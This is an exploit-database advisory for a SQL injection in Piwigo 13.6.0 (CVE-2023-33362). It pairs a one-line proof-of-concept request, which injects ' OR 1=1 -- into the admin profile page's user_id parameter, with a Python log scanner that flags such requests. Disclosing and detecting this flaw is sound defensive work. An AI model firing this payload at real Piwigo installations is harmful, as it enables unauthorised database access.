[webapps] Piwigo 13.6.0 - SQL Injection
Piwigo 13.6.0 contains a SQL injection vulnerability (CVE-2023-33362); an attacker can exploit it by sending a specially crafted request. 2025-12-02 00:00:00 Author: www.exploit-db.com

# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage:  https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0 
# Tested on: Windows
# CVE : CVE-2023-33362


Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

Steps to Reproduce
Login as an admin user.
Send the request.
Observe the result.
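
A defender-side check for the request above, as an added example that is not part of the original advisory: it scans web access logs for `/admin.php?page=profile` requests whose `user_id` is not a plain integer. It assumes that legitimate `user_id` values are numeric and that the server writes combined-format logs; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2025:10:00:01 +0000] "GET /admin.php?page=profile&user_id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Dec/2025:10:00:07 +0000] "GET /admin.php?page=profile&user_id=%27%20OR%201=1%20--%20 HTTP/1.1" 200 9731 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Dec/2025:10:01:12 +0000] "GET /index.php?/category/3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Dec/2025:10:02:30 +0000] "GET /admin.php?page=history&user_id=abc HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# Client address and request target; the lazy match tolerates raw spaces in the URL.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<target>.+?) HTTP/\d(?:\.\d)?" '
)


def check_line(line):
    """Return (client, decoded user_id) for a profile request whose
    user_id is not a plain integer; return None for anything else."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.endswith("/admin.php"):
        return None
    params = parse_qs(parts.query)  # percent-decodes names and values
    if params.get("page") != ["profile"]:
        return None
    for value in params.get("user_id", []):
        # Assumption: a legitimate user_id is an ASCII integer.
        if re.fullmatch(r"[0-9]+", value) is None:
            return match.group("client"), value
    return None


def scan(lines):
    """Collect every flagged (client, user_id) pair, in log order."""
    return [hit for hit in map(check_line, lines) if hit is not None]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"non-numeric user_id from {client}: {value!r}")
```
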
            

Source: https://www.exploit-db.com/exploits/52443